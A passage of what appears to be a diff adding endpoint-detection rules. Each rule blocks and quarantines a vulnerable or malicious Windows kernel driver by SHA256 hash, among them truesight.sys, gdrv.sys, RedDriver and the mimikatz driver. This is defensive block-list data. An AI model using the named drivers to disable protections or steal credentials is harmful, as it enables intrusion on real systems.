"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd9386206a5dfdf63bf642e2917fae6d5e8a1e52874cb2cfbabf79e47b9fed74", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bccb1037-c236-5ce3-b136-645abad8f0fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479699Z", + "creation_date": "2026-03-23T11:45:31.479704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1799e5e5eb44ccfc05a608a774123de9904eb0a7ef66b5bc700bbe6cc2c8050b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bccb6707-2470-56d6-be44-f176b497bb65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827551Z", + "creation_date": "2026-03-23T11:45:31.827553Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827558Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac886acabff4efcbb5bf8c3646ffc3d69b430071c930f75901cc28fca58b0426", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcda955c-3634-58d4-92e9-361191d9d609", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978994Z", + "creation_date": "2026-03-23T11:45:29.978996Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7", + "comment": "Vulnerable Kernel Driver (aka PanMonFlt.sys) [https://www.loldrivers.io/drivers/cfdc5cb4-be5c-4dcc-a883-825fa72115b4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bce01599-c641-5086-a0b7-3fb2ffe52c23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828530Z", + "creation_date": "2026-03-23T11:45:31.828532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b68e91f11b63ed6b2caa8b8c03bcc5b28210fdf36fab9ce1d9706fb8e9e5285", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bce30193-0a7c-5256-8365-382d9c2b9fe5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494600Z", + "creation_date": "2026-03-23T11:45:31.494602Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bce14e5016db8663b596dadca0e015ff9a067b79f160ef7bbab9b3db0035bfd5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bce7a2ff-307a-5412-a8e6-8f6f79c2d373", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494674Z", + "creation_date": "2026-03-23T11:45:31.494675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494681Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e25cdb818e9d00ec76d9d9629c9e25878a7b24391f3bd74d848ae369aea7e381", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bced4887-af6e-5e73-904c-d6248d1f8623", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465340Z", + "creation_date": "2026-03-23T11:45:30.465343Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d032001eab6cad4fbef19aab418650ded00152143bd14507e17d62748297c23f", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcf3791a-24c1-5d9f-a703-540502e0d76d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813272Z", + "creation_date": "2026-03-23T11:45:31.813274Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e655b8c85566dc7158cb381a0c045fe5e37614a3e6a6bd856884583a05217d1a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcf68611-1727-5f3e-beb2-0284c7e762e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827508Z", + "creation_date": "2026-03-23T11:45:30.827510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827515Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69ae4f18c56e45904550ed993c4b177bf2ade201b94e6a3307dbfae8a5747cc4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcfda42b-da19-5e1c-94c7-cdf817174cd8", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156620Z", + "creation_date": "2026-03-23T11:45:31.156622Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156628Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3cfa1b06a0aa138c7c65e8c9a796592e04bd6ec2ed245fd27f512df0996ef25", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd059a01-bd8f-5f9a-b2ec-2193df342840", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606687Z", + "creation_date": "2026-03-23T11:45:29.606689Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.606695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28f82b626697dcdccdcc1dee693e9f5c0e605f794f93bb04a3bb80cf0e9f0601", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd07fe6f-3d62-5a5e-9cb3-09bf20ffec0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822600Z", + "creation_date": "2026-03-23T11:45:30.822602Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822607Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df1fa63048807a9372a9b29baa712ef3c448ae28fc2c7da559714e40b1321a4d", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd149903-88ca-5cc4-a923-d8de6639499d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609058Z", + "creation_date": "2026-03-23T11:45:29.609060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f1fc8287dd8d724972d7a165683f2b2ad6837e16f09fe292714e8e38ecd1e38", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd1c7056-6de1-5e1a-9e52-5e729d415158", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145325Z", + "creation_date": "2026-03-23T11:45:31.145327Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4133b502bddff463b1f8555bb3e67c607a13a2920e8d80e5d42616a212035fa4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd28842c-cc9a-5f1c-bf04-17e77c85d351", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475188Z", + "creation_date": "2026-03-23T11:45:30.475192Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475200Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0381632cd236cd94fa9e64ccc958516ac50f9437f99092e231a607b1e6be6cf8", + "comment": "Vulnerable Kernel Driver (aka bs_rcio64.sys) [https://www.loldrivers.io/drivers/cacf18a5-6d7d-4a63-92d4-bda386a3da18/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd2a54c9-39a4-5d07-81a5-7354b00b57a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836523Z", + "creation_date": 
"2026-03-23T11:45:30.836525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45962808c890a618c9552c9412e249e8f477cc4d426ba4037bd828f7ee603569", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd33f6f1-622c-5313-8993-e662fa2fc3a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819295Z", + "creation_date": "2026-03-23T11:45:30.819297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819303Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43136de6b77ef85bc661d401723f38624e93c4408d758bc9f27987f2b4511fee", + "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd3ec56f-017e-5d28-ba5f-a2e6ac69bee5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457718Z", + "creation_date": "2026-03-23T11:45:30.457721Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6389dca278be297b95846badc2b6859b488f123dbdc5d7bfc6f4393eeb7e678", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd41f12c-3491-5d38-887d-3dce22660146", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464090Z", + "creation_date": "2026-03-23T11:45:30.464093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464102Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4f041de66ec8cc5ab4a03bbc46f99e073157a4e915a9ab4069162de834ffc5c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd43a33c-8907-50be-9143-ff3fd494b642", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152750Z", + "creation_date": "2026-03-23T11:45:31.152753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bedf7bf28b9f330e16311668e2adda26e62008113a74db2880691f38e62fbf02", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd562f90-c592-56d5-8e9d-d6778bb32445", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619126Z", + "creation_date": "2026-03-23T11:45:29.619128Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619133Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a37371c4e62f106e7da03fd5bdd6f12ecdf7fcaf1195dbf9fb7ef6eb456a7506", + "comment": "Vulnerable Kernel Driver (aka amp.sys) [https://www.loldrivers.io/drivers/ca768fc5-9b5c-4ced-90ab-fd6be9a70199/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd596d3a-fc5f-511e-915c-44c13a83667a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827751Z", + "creation_date": "2026-03-23T11:45:30.827753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827759Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40f6650ac8f07f2c1a76376940743c46d7a81364d4dd04c625691f3752aec4ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd5de4cb-9a5b-5857-b284-c9b7f84851ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986083Z", + "creation_date": "2026-03-23T11:45:29.986085Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81f4258c5aee1bfe424880fbc61a1928a816014c502f010be03becbb42e648fb", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd638b77-aa52-58dd-9059-c1d7450be29a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815840Z", + "creation_date": "2026-03-23T11:45:30.815842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebf0e56a1941e3a6583aab4a735f1b04d4750228c18666925945ed9d7c9007e1", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd7635fa-20ae-51ce-8e45-f3ebc2196b1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 